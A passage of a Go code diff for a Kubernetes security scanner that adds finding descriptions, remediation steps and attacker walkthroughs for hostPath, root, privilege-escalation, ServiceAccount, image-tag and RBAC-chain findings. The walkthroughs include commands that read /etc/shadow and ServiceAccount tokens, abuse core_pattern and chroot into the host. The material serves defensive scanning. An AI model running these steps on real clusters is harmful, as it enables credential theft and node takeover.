+func contentHostPath001(kind, namespace, name, volumeName, path string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("HostPath mount `%s` in `%s/%s/%s`", path, kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` mounts host path `%s` via volume `%s`. Generic hostPath usage breaks the container abstraction: the pod is now coupled to a specific node's filesystem layout, bypasses CSI quota/encryption/snapshotting, and creates a path-dependent attack surface that varies with the path mounted.\n\n"+
+			"Even \"benign\" paths can be dangerous. `/proc` exposes the host's process tree (modify `/proc/sys/kernel/core_pattern` for root via crash). `/sys` lets a writable mount enable cgroup-release-agent escapes (CVE-2022-0492). `/dev` shared with the host gives raw block-device access. `/etc/kubernetes` contains kubelet config and PKI on control-plane nodes.\n\n"+
+			"Even a mount of `/etc` (read-only) leaks `/etc/shadow`, ssh `host_keys`, kubeadm config, and CNI tokens. Kubernetes Pod Security Standards forbid hostPath at Baseline because there is no safe whitelist.",
+			kind, namespace, name, path, volumeName),
+		Impact: "Variable but always elevated risk: at minimum exposes node-specific files; commonly leaks credentials or enables privilege escalation depending on the path.",
+		AttackScenario: []string{
+			"Identify the mounted path via `mount` or `cat /proc/mounts` from inside the pod.",
+			"Enumerate sensitive contents — for `/etc`: `cat /etc/shadow`, `/etc/kubernetes/admin.conf`; for `/proc`: `echo '|/tmp/x' > /proc/sys/kernel/core_pattern` then trigger a crash.",
+			"If writable, drop a payload, modify a config, or symlink-swap.",
+			"Confirm impact with `kdigger dig mount` or `deepce.sh -e`.",
+			"Persist via the path's owning daemon (cron under `/etc`, systemd unit under `/lib/systemd`, etc.).",
+		},
+		Remediation: "Replace hostPath with a managed alternative (CSI volume, ConfigMap, Secret, projected volume, or local PV).",
+		RemediationSteps: []string{
+			"Determine why hostPath is used — config injection, log scraping, GPU device access. Each has a Kubernetes-native replacement.",
+			"If hostPath is unavoidable, narrow `path:` to the smallest possible directory, set `type:` to the strictest matching value, and add `readOnly: true` on the volumeMount.",
+			"Pair with `runAsNonRoot: true`, drop `ALL` capabilities, and `allowPrivilegeEscalation: false`.",
+			fmt.Sprintf("Enforce via PSA `baseline` (denies hostPath) or a Kyverno/Gatekeeper allowlist. Validate: `kubectl get %s/%s -o yaml | grep -A3 hostPath`.", strings.ToLower(kind), name),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — Volumes: hostPath", URL: "https://kubernetes.io/docs/concepts/storage/volumes/#hostpath"},
+			refPSS,
+			{Title: "Quarkslab — Kubernetes and HostPath", URL: "https://blog.quarkslab.com/kubernetes-and-hostpath-a-love-hate-relationship.html"},
+			{Title: "CVE-2021-25741 (subPath/symlink escape)", URL: "https://github.com/kubernetes/kubernetes/issues/104980"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_001, mitreT1083},
+	}
+}
+
+func contentPodSecAPE001(kind, namespace, name, container string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Container `%s` allows privilege escalation in `%s/%s/%s`", container, kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Container `%s` in `%s/%s/%s` either omits `securityContext.allowPrivilegeEscalation` or sets it to `true`. This directly controls the `no_new_privs` Linux process flag: when `allowPrivilegeEscalation: false`, the kernel sets `NoNewPrivs: 1` on PID 1 in the container, and any subsequent `execve()` call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.\n\n"+
+			"Leaving the field unset is dangerous because the runtime default is `true` for backward compatibility. If the container image happens to contain a setuid binary — even an inadvertent one from the base image (`mount`, `ping`, `su`, vendor agent helpers) — an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.\n\n"+
+			"The Pod Security Standards Restricted profile mandates `allowPrivilegeEscalation: false` precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.",
+			container, kind, namespace, name),
+		Impact: "If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.",
+		AttackScenario: []string{
+			"Gain code execution as a non-root user (web RCE in a Node/Python/Java app).",
+			"Enumerate setuid binaries: `find / -perm -4000 -type f 2>/dev/null` (often returns `/usr/bin/passwd`, `/bin/su`, `/bin/mount`, `/usr/bin/newuidmap`).",
+			"Exploit one — `su -` if password-less, or a known setuid CVE.",
+			"Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.",
+		},
+		Remediation: "Set `allowPrivilegeEscalation: false` on every container.",
+		RemediationSteps: []string{
+			"Add `allowPrivilegeEscalation: false` to each container's `securityContext`. Pair with `capabilities.drop: [ALL]` and `runAsNonRoot: true`.",
+			"Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (`find / -perm -4000 -exec chmod u-s {} +`).",
+			"Apply Pod Security Admission `restricted` to the namespace.",
+			fmt.Sprintf("Validate: `kubectl get pod -n %s -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}'` returns `false` for every container.", namespace),
+		},
+		LearnMore: []models.Reference{refPSS,
+			{Title: "Christophe Tafani-Dereeper — Stop worrying about allowPrivilegeEscalation", URL: "https://blog.christophetd.fr/stop-worrying-about-allowprivilegeescalation/"},
+			{Title: "kernel.org — prctl(PR_SET_NO_NEW_PRIVS)", URL: "https://www.kernel.org/doc/html/latest/userspace-api/no_new_privs.html"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1548_001, mitreT1611},
+	}
+}
+
+func contentPodSecRoot001(kind, namespace, name, container string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Container `%s` runs as root (UID 0) in `%s/%s/%s`", container, kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Container `%s` in `%s/%s/%s` runs as UID 0 — either via an explicit `runAsUser: 0`, an explicit `runAsNonRoot: false`, or by relying on the image's default user (which for most public images is root). Container UID 0 is mapped to host UID 0 by default (Linux user namespaces are still off-by-default in Kubernetes), so any kernel exploit, capability misuse, or volume-write vulnerability lands with full root privileges.\n\n"+
+			"Running as root erodes every layer of in-container defense. A read-only root filesystem can be remounted (`mount -o remount,rw`) if CAP_SYS_ADMIN is held; a kernel CVE that requires root credentials in user-space (the runC \"Leaky Vessels\" CVE-2024-21626 class, the cgroup-release-agent CVE-2022-0492 class) becomes trivially exploitable; and bind-mounted directories owned by host root become writable.\n\n"+
+			"The Pod Security Standards Restricted profile requires `runAsNonRoot: true` AND a `runAsUser` ≥ 1.",
+			container, kind, namespace, name),
+		Impact: "All other in-pod hardening (read-only root, capability drops, seccomp) becomes one CVE away from full host compromise; container-CVE exploit reliability rises dramatically.",
+		AttackScenario: []string{
+			"Gain code execution as root inside the container.",
+			"Read all bind-mounted host files writable to root, including ConfigMaps and Secrets.",
+			"Attempt a capability-bearing kernel exploit — e.g., trigger CVE-2024-21626 (Leaky Vessels) by spawning a child with `WORKDIR=/proc/self/fd/8` semantics.",
+			"With CAP_SYS_ADMIN remount the root filesystem read-write and modify init scripts.",
+			"Persist via dropped binaries in `/usr/local/bin` whose mounts may survive container restart.",
+		},
+		Remediation: "Run as a non-root UID (`runAsUser: 10001`, `runAsNonRoot: true`) and bake a non-root USER into the image.",
+		RemediationSteps: []string{
+			"In the Dockerfile, add `RUN groupadd -g 10001 app && useradd -u 10001 -g app -s /usr/sbin/nologin app` and `USER 10001`. Verify the binary works (file permissions, port binding < 1024 needs `NET_BIND_SERVICE`).",
+			"In the PodSpec, set `securityContext.runAsNonRoot: true`, `runAsUser: 10001`, `runAsGroup: 10001`, `fsGroup: 10001`.",
+			"Pair with `allowPrivilegeEscalation: false`, `capabilities.drop: [ALL]`, `readOnlyRootFilesystem: true`, `seccompProfile.type: RuntimeDefault`.",
+			fmt.Sprintf("Validate: `kubectl exec <pod> -- id` returns `uid=10001`; `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.containers[*].securityContext.runAsUser}'` returns 10001.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{refPSS, refSecurityContext, refNSAHardening,
+			{Title: "CVE-2024-21626 (Leaky Vessels)", URL: "https://nvd.nist.gov/vuln/detail/cve-2024-21626"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1068, mitreT1548_001},
+	}
+}
+
+func contentSADefault001(kind, namespace, name, serviceAccount string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Workload `%s/%s/%s` runs as the namespace `default` ServiceAccount", kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Workload `%s/%s/%s` does not specify `serviceAccountName` and therefore runs as the namespace's `default` ServiceAccount, which by default has its token auto-mounted at `/var/run/secrets/kubernetes.io/serviceaccount/token`.\n\n"+
+			"The `default` SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake — `subjects: [{kind: ServiceAccount, name: default, namespace: foo}]`), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.\n\n"+
+			"The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs `kubectl auth can-i --list` to find every accreted permission — often elevated by drift over the namespace's lifetime.",
+			kind, namespace, name),
+		Impact: "Token theft yields whatever permissions the namespace `default` SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.",
+		AttackScenario: []string{
+			"RCE in the pod.",
+			"Read the SA token: `cat /var/run/secrets/kubernetes.io/serviceaccount/token`.",
+			"Enumerate permissions: `kubectl --token=$TOKEN auth can-i --list`.",
+			"Exploit any usable verb — common findings: `secrets/get` (loot all secrets), `pods/exec` (shell into other pods), `pods/create` with privileged template (escalate to node).",
+			"Persist by creating a hidden Deployment with the same compromised SA.",
+		},
+		Remediation: "Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace `default` SA.",
+		RemediationSteps: []string{
+			fmt.Sprintf("Create a ServiceAccount: `kubectl -n %s create sa %s-sa`. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.", namespace, name),
+			fmt.Sprintf("Reference the new SA in the PodSpec via `serviceAccountName: %s-sa`. If the app does NOT need to talk to the API at all, also set `automountServiceAccountToken: false`.", name),
+			fmt.Sprintf("Disable automount on the namespace default SA: `kubectl patch sa default -n %s -p '{\"automountServiceAccountToken\": false}'`.", namespace),
+			fmt.Sprintf("Validate: `kubectl get pod -n %s -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}'` returns the new SA, not `%s`.", namespace, serviceAccount),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — Configure Service Accounts for Pods", URL: "https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/"},
+			{Title: "Kubernetes — Service Accounts", URL: "https://kubernetes.io/docs/concepts/security/service-accounts/"},
+			{Title: "Kubernetes — RBAC Good Practices", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_001, mitreT1078, mitreT1528},
+	}
+}
+
+func contentImageLatest001(kind, namespace, name, container, image string) ruleContent {
+	scope := scopeForWorkload(kind, namespace, name)
+	return ruleContent{
+		Title: fmt.Sprintf("Container `%s` uses mutable image tag `%s` in `%s/%s/%s`", container, image, kind, namespace, name),
+		Scope: scope,
+		Description: fmt.Sprintf("Container `%s` in `%s/%s/%s` references the image `%s` using a mutable tag (either `:latest` or no tag, which Kubernetes resolves to `:latest`). Mutable tags break two safety properties: (1) the same manifest produces non-deterministic deployments, since the tag may resolve to different content on different days; (2) there is no cryptographic binding between the manifest and the image content actually run, so registry-side or in-flight tampering cannot be detected.\n\n"+
+			"This is a defense-evasion / supply-chain hygiene finding rather than an active exploit. Image digests (`@sha256:<hex>`) are immutable — the digest is computed over the manifest content, so any change yields a different digest. SLSA, Sigstore Cosign, and admission controllers like Kyverno or Connaisseur are the modern controls; pinning to a digest is the prerequisite for verifying signatures.\n\n"+
+			"A public package compromise (Codecov-style or PyPI-typosquat scenarios, or the 2024 ultralytics PyPI compromise) can republish `image:latest` with malicious code; clusters with `imagePullPolicy: Always` and `:latest` silently pick it up. Pinning to a digest turns a silent supply-chain attack into a noisy CI failure.",
+			container, kind, namespace, name, image),
+		Impact: "Non-deterministic deployments and silent ingestion of upstream supply-chain compromises; disables digest-based verification and signature checking.",
+		AttackScenario: []string{
+			"Attacker compromises an upstream image (registry credential leak, typosquat, or maintainer takeover).",
+			"Pushes `vendor/app:latest` with a malicious additional layer.",
+			"Target cluster's pod restarts and `imagePullPolicy: Always` re-pulls the tag, getting the new digest silently.",
+			"Malicious code runs under the workload's existing RBAC/secrets context.",
+			"Without digest pinning or signature verification, defenders have no signal until detection-tier tools fire on the malicious behavior.",
+		},
+		Remediation: "Pin every image to an immutable digest (`@sha256:...`) and verify signatures at admission.",
+		RemediationSteps: []string{
+			"Resolve the digest: `crane digest <ref>` or `docker buildx imagetools inspect <image>:<tag>`. Update manifests to `image: <repo>@sha256:<digest>` (you may keep the tag for documentation: `image: <repo>:1.2.3@sha256:<digest>`).",
+			"Set `imagePullPolicy: IfNotPresent` (digest pinning makes Always unnecessary). For images that absolutely must float, apply a Kyverno policy that rejects `:latest`.",
+			"Sign images at build time with Sigstore Cosign and enforce verification at admission with Connaisseur, Kyverno's `verifyImages` rule, or sigstore-policy-controller.",
+			fmt.Sprintf("Validate: `kubectl get %s/%s -n %s -o jsonpath='{.spec.template.spec.containers[*].image}'` contains `@sha256:`.", strings.ToLower(kind), name, namespace),
+		},
+		LearnMore: []models.Reference{
+			{Title: "Kubernetes — Images", URL: "https://kubernetes.io/docs/concepts/containers/images/"},
+			{Title: "Sigstore Cosign", URL: "https://docs.sigstore.dev/cosign/overview/"},
+			{Title: "Connaisseur — Verify Container Image Signatures", URL: "https://sse-secure-systems.github.io/connaisseur/v2.0.0/"},
+			{Title: "SLSA Framework", URL: "https://slsa.dev/"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1525, mitreT1195_002, mitreT1554},
+	}
+}

--- a/internal/analyzer/privesc/analyzer.go
+++ b/internal/analyzer/privesc/analyzer.go
@@ -7,7 +7,6 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
-	"strings"
 
 	"github.com/hardik/kubesplaining/internal/models"
 )
@@ -62,8 +61,7 @@ func findingFromPath(path models.EscalationPath) models.Finding {
 		category = models.CategoryDataExfiltration
 	}
 
-	title := fmt.Sprintf("%s can reach %s in %d hop(s)", path.Source.Key(), targetLabel(target), len(path.Hops))
-	remediation := targetRemediation(target)
+	content := contentForTarget(path.Source, target, path.Hops)
 
 	evidence, _ := json.Marshal(map[string]any{
 		"target":        string(target),
@@ -74,22 +72,48 @@ func findingFromPath(path models.EscalationPath) models.Finding {
 	})
 
 	id := fmt.Sprintf("%s:%s:%s", ruleID, path.Source.Key(), target)
+	references := make([]string, 0, len(content.LearnMore))
+	for _, ref := range content.LearnMore {
+		references = append(references, ref.URL)
+	}
 
 	subject := path.Source
 	return models.Finding{
-		ID:             id,
-		RuleID:         ruleID,
-		Severity:       severity,
-		Score:          score,
-		Category:       category,
-		Title:          title,
-		Description:    chainDescription(path),
-		Subject:        &subject,
-		Evidence:       evidence,
-		Remediation:    remediation,
-		References:     []string{"https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html"},
-		EscalationPath: path.Hops,
-		Tags:           []string{"module:privesc", "target:" + string(target)},
+		ID:               id,
+		RuleID:           ruleID,
+		Severity:         severity,
+		Score:            score,
+		Category:         category,
+		Title:            content.Title,
+		Description:      content.Description,
+		Subject:          &subject,
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidence,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       references,
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		EscalationPath:   path.Hops,
+		Tags:             []string{"module:privesc", "target:" + string(target)},
+	}
+}
+
+// contentForTarget dispatches to the matching content builder based on the path's terminal sink.
+func contentForTarget(source models.SubjectRef, target models.EscalationTarget, hops []models.EscalationHop) ruleContent {
+	switch target {
+	case models.TargetClusterAdmin:
+		return contentClusterAdminPath(source, hops)
+	case models.TargetNodeEscape:
+		return contentNodeEscapePath(source, hops)
+	case models.TargetKubeSystemSecrets:
+		return contentKubeSystemSecretsPath(source, hops)
+	case models.TargetSystemMasters:
+		return contentSystemMastersPath(source, hops)
+	default:
+		return contentGenericPath(source, target, hops)
 	}
 }
 
@@ -154,22 +178,6 @@ func targetLabel(target models.EscalationTarget) string {
 	}
 }
 
-// targetRemediation returns the canonical remediation guidance for each escalation target.
-func targetRemediation(target models.EscalationTarget) string {
-	switch target {
-	case models.TargetClusterAdmin:
-		return "Break the chain: remove RBAC write/bind/escalate or wildcard permissions from intermediate subjects."
-	case models.TargetNodeEscape:
-		return "Remove privileged/hostPath mounts from pods reachable via this chain, or constrain who can create/exec into those pods."
-	case models.TargetKubeSystemSecrets:
-		return "Restrict `get/list/watch` on secrets to a minimal set of controllers, especially cluster-wide and in kube-system."
-	case models.TargetSystemMasters:
-		return "Remove impersonation permissions that can reach system:masters."
-	default:
-		return "Investigate and constrain the permissions that enable this escalation path."
-	}
-}
-
 // uniqueTechniques returns the deduplicated list of hop Actions along the path for evidence summaries.
 func uniqueTechniques(hops []models.EscalationHop) []string {
 	seen := map[string]struct{}{}
@@ -202,16 +210,4 @@ func chainSummary(hops []models.EscalationHop) []string {
 		summary = append(summary, fmt.Sprintf("%d. %s [%s]", hop.Step, hop.Action, hop.Permission))
 	}
 	return summary
-}
-
-// chainDescription returns a one-sentence narrative describing how the path chains hops together.
-func chainDescription(path models.EscalationPath) string {
-	if len(path.Hops) == 0 {
-		return fmt.Sprintf("%s reaches %s without intermediate hops.", path.Source.Key(), targetLabel(path.Target))
-	}
-	var parts []string
-	for _, hop := range path.Hops {
-		parts = append(parts, hop.Gains)
-	}
-	return fmt.Sprintf("Chain of %d hop(s): %s.", len(path.Hops), strings.Join(parts, " → "))
 }

--- a/internal/analyzer/privesc/content.go
+++ b/internal/analyzer/privesc/content.go
@@ -1,0 +1,291 @@
+// Content for privilege-escalation path findings. Each builder takes runtime context
+// (source subject, hop chain, target sink) and returns ruleContent with explicit scope,
+// step-by-step attacker walkthrough that mirrors the chain, ordered remediation that
+// names the *weakest* hop to remove, and authoritative references.
+//
+// Sources: HackTricks Cloud — Abusing Roles/ClusterRoles in K8s, Aqua Security
+// "Kubernetes Privilege Escalation: Excessive Permissions in Popular Helm Charts" (2024),
+// MITRE ATT&CK Containers, Microsoft Threat Matrix for Kubernetes, Bishop Fox Power Outages
+// research, Christophe Tafani-Dereeper EKS-IMDS-pivot, NSA/CISA Hardening Guide v1.2.
+package privesc
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/hardik/kubesplaining/internal/models"
+)
+
+type ruleContent struct {
+	Title            string
+	Scope            models.Scope
+	Description      string
+	Impact           string
+	AttackScenario   []string
+	Remediation      string
+	RemediationSteps []string
+	LearnMore        []models.Reference
+	MitreTechniques  []models.MitreTechnique
+}
+
+var (
+	mitreT1078_004 = models.MitreTechnique{ID: "T1078.004", Name: "Valid Accounts: Cloud Accounts", URL: "https://attack.mitre.org/techniques/T1078/004/"}
+	mitreT1098     = models.MitreTechnique{ID: "T1098", Name: "Account Manipulation", URL: "https://attack.mitre.org/techniques/T1098/"}
+	mitreT1611     = models.MitreTechnique{ID: "T1611", Name: "Escape to Host", URL: "https://attack.mitre.org/techniques/T1611/"}
+	mitreT1552_007 = models.MitreTechnique{ID: "T1552.007", Name: "Container API", URL: "https://attack.mitre.org/techniques/T1552/007/"}
+	mitreT1068     = models.MitreTechnique{ID: "T1068", Name: "Exploitation for Privilege Escalation", URL: "https://attack.mitre.org/techniques/T1068/"}
+	mitreT1556     = models.MitreTechnique{ID: "T1556", Name: "Modify Authentication Process", URL: "https://attack.mitre.org/techniques/T1556/"}
+)
+
+var (
+	refHackTricksRBAC = models.Reference{Title: "HackTricks Cloud — Abusing RBAC in Kubernetes", URL: "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html"}
+	refRBACGoodPrac   = models.Reference{Title: "Kubernetes — RBAC good practices", URL: "https://kubernetes.io/docs/concepts/security/rbac-good-practices/"}
+	refMSThreatMatrix = models.Reference{Title: "Microsoft — Threat Matrix for Kubernetes", URL: "https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/"}
+	refNSAHardening   = models.Reference{Title: "NSA/CISA Kubernetes Hardening Guidance v1.2 (PDF)", URL: "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF"}
+)
+
+// scopeForPath returns scope based on the target sink. Cluster-admin and system:masters are
+// always cluster scope; node-escape is cluster scope (host root → all nodes); kube-system
+// secrets is namespace scope. The Detail names the source subject so the reader sees who
+// can reach the sink.
+func scopeForPath(source models.SubjectRef, target models.EscalationTarget) models.Scope {
+	switch target {
+	case models.TargetClusterAdmin, models.TargetSystemMasters, models.TargetNodeEscape:
+		return models.Scope{
+			Level:  models.ScopeCluster,
+			Detail: fmt.Sprintf("Source `%s` → `%s` — terminal sink is cluster-scoped (full API control or host root)", source.Key(), targetLabel(target)),
+		}
+	case models.TargetKubeSystemSecrets:
+		return models.Scope{
+			Level:  models.ScopeNamespace,
+			Detail: fmt.Sprintf("Source `%s` → kube-system Secrets — control-plane namespace; reads here typically yield credentials usable cluster-wide", source.Key()),
+		}
+	default:
+		return models.Scope{
+			Level:  models.ScopeCluster,
+			Detail: fmt.Sprintf("Source `%s` → `%s`", source.Key(), targetLabel(target)),
+		}
+	}
+}
+
+// hopNarrative renders one hop into a single-sentence attacker step using the hop's
+// own Gains field plus the technique label.
+func hopNarrative(hop models.EscalationHop) string {
+	parts := []string{}
+	if hop.Action != "" {
+		parts = append(parts, fmt.Sprintf("technique `%s`", hop.Action))
+	}
+	if hop.Permission != "" {
+		parts = append(parts, fmt.Sprintf("via permission `%s`", hop.Permission))
+	}
+	if hop.Gains != "" {
+		parts = append(parts, hop.Gains)
+	}
+	prefix := fmt.Sprintf("Step %d: from `%s` to `%s`", hop.Step, hop.FromSubject.Key(), hop.ToSubject.Key())
+	if len(parts) == 0 {
+		return prefix + "."
+	}
+	return prefix + " — " + strings.Join(parts, "; ") + "."
+}
+
+// hopsRemediation surfaces the hop most suitable for breaking the chain: prefer mid-chain
+// `pod_create_token_theft`, `impersonate`, `bind`, `escalate` techniques, then fall back to
+// the first hop. Returns a human-readable description for the remediation step.
+func hopsRemediation(hops []models.EscalationHop) string {
+	if len(hops) == 0 {
+		return "constrain the source subject's permissions"
+	}
+	priority := []string{"impersonate", "bind", "escalate", "pod_create_token_theft", "secrets_read_token", "wildcard_verbs", "exec_pod"}
+	for _, want := range priority {
+		for _, hop := range hops {
+			if strings.Contains(hop.Action, want) {
+				return fmt.Sprintf("remove the `%s` capability that enables hop %d (`%s` → `%s`)", hop.Permission, hop.Step, hop.FromSubject.Key(), hop.ToSubject.Key())
+			}
+		}
+	}
+	hop := hops[0]
+	return fmt.Sprintf("remove the permission `%s` that enables the first hop (`%s` → `%s`)", hop.Permission, hop.FromSubject.Key(), hop.ToSubject.Key())
+}
+
+func contentClusterAdminPath(source models.SubjectRef, hops []models.EscalationHop) ruleContent {
+	hopCount := len(hops)
+	steps := make([]string, 0, hopCount+2)
+	steps = append(steps, fmt.Sprintf("Attacker compromises any pod or credential associated with `%s` (RCE in any application using its identity, leaked token, or compromised image).", source.Key()))
+	for _, hop := range hops {
+		steps = append(steps, hopNarrative(hop))
+	}
+	steps = append(steps, "Final step: attacker now wields a credential authorized for `verbs:[*]` on `resources:[*]` — they read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.")
+	return ruleContent{
+		Title: fmt.Sprintf("`%s` can reach **cluster-admin equivalent** in %d hop(s)", source.Key(), hopCount),
+		Scope: scopeForPath(source, models.TargetClusterAdmin),
+		Description: fmt.Sprintf("Subject `%s` has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (`verbs:[*]` on `resources:[*]`). The graph search found a chain of %d hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not \"could this be exploited\" but \"how quickly\" — every hop is a built-in API operation, no exploit dev needed.\n\n"+
+			"The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):\n%s\n\n"+
+			"This finding is correlated against pod-mounted ServiceAccounts and the engine's `correlate` pass — a chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.",
+			source.Key(), hopCount, formatHopList(hops)),
+		Impact:         fmt.Sprintf("Compromise of `%s` (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.", source.Key()),
+		AttackScenario: steps,
+		Remediation:    fmt.Sprintf("Break the chain at the weakest hop: %s.", hopsRemediation(hops)),
+		RemediationSteps: []string{
+			"Confirm the chain is real with `kubectl auth can-i` for each verb the engine cited (run as the source SA / each intermediate hop).",
+			fmt.Sprintf("Identify the lowest-cost hop to break (typically %s) — removing one mid-chain hop kills the entire path.", hopsRemediation(hops)),
+			"Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.",
+			"For each remaining `wildcard verbs / wildcard resources` binding in the chain, run `audit2rbac` to derive the minimum verbs the workload actually uses, then replace.",
+			"Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with `verbs:[*]` on `resources:[*]` to non-system subjects, plus a CI check that re-runs `kubesplaining` against the rendered manifests of every PR.",
+		},
+		LearnMore: []models.Reference{
+			refHackTricksRBAC,
+			refRBACGoodPrac,
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078_004, mitreT1098, mitreT1068, mitreT1556},
+	}
+}
+
+func contentNodeEscapePath(source models.SubjectRef, hops []models.EscalationHop) ruleContent {
+	hopCount := len(hops)
+	steps := make([]string, 0, hopCount+2)
+	steps = append(steps, fmt.Sprintf("Attacker compromises any workload or credential bound to `%s`.", source.Key()))
+	for _, hop := range hops {
+		steps = append(steps, hopNarrative(hop))
+	}
+	steps = append(steps, "Final step: a privileged pod with `hostPath: /` (or `hostPID + privileged: true`) is created. The attacker `chroot /host bash` and now runs as root on the worker node — reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.")
+	return ruleContent{
+		Title: fmt.Sprintf("`%s` can reach **node escape** (host root) in %d hop(s)", source.Key(), hopCount),
+		Scope: scopeForPath(source, models.TargetNodeEscape),
+		Description: fmt.Sprintf("Subject `%s` has a privesc path that terminates in the ability to schedule a pod with host-level access (`hostPath: /`, `privileged: true`, `hostPID`, or hostNetwork) — which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.\n\n"+
+			"The chain (%d hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):\n%s\n\n"+
+			"Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's `cni0`/`flannel.1`/`cali*` interface, and exfiltrate every projected ServiceAccount token by reading `/var/lib/kubelet/pods/*/volumes/.../token`. From there, those tokens cascade into more cluster-admin paths.",
+			source.Key(), hopCount, formatHopList(hops)),
+		Impact:         fmt.Sprintf("Compromise of `%s` yields host root on a worker node — every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.", source.Key()),
+		AttackScenario: steps,
+		Remediation:    fmt.Sprintf("Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: %s.", hopsRemediation(hops)),
+		RemediationSteps: []string{
+			"Identify which hop ends in `pod_create_*` or grants Pod Security violations (`privileged`, `hostPath`, `hostPID`, `hostNetwork`).",
+			"Apply Pod Security Admission `restricted` profile to namespaces reachable from this chain — `kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted`. This blocks privileged pods at admission.",
+			"Audit any namespace that is `privileged`-labeled — DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.",
+			fmt.Sprintf("Remove the cited capability: %s.", hopsRemediation(hops)),
+			"Wire admission policy (Kyverno `restrict-host-path-mount`, `disallow-privileged-containers`) so future pods cannot regress.",
+		},
+		LearnMore: []models.Reference{
+			refHackTricksRBAC,
+			{Title: "Kubernetes — Pod Security Standards", URL: "https://kubernetes.io/docs/concepts/security/pod-security-standards/"},
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1611, mitreT1552_007, mitreT1068, mitreT1078_004},
+	}
+}
+
+func contentKubeSystemSecretsPath(source models.SubjectRef, hops []models.EscalationHop) ruleContent {
+	hopCount := len(hops)
+	steps := make([]string, 0, hopCount+2)
+	steps = append(steps, fmt.Sprintf("Attacker compromises any workload mounting `%s`.", source.Key()))
+	for _, hop := range hops {
+		steps = append(steps, hopNarrative(hop))
+	}
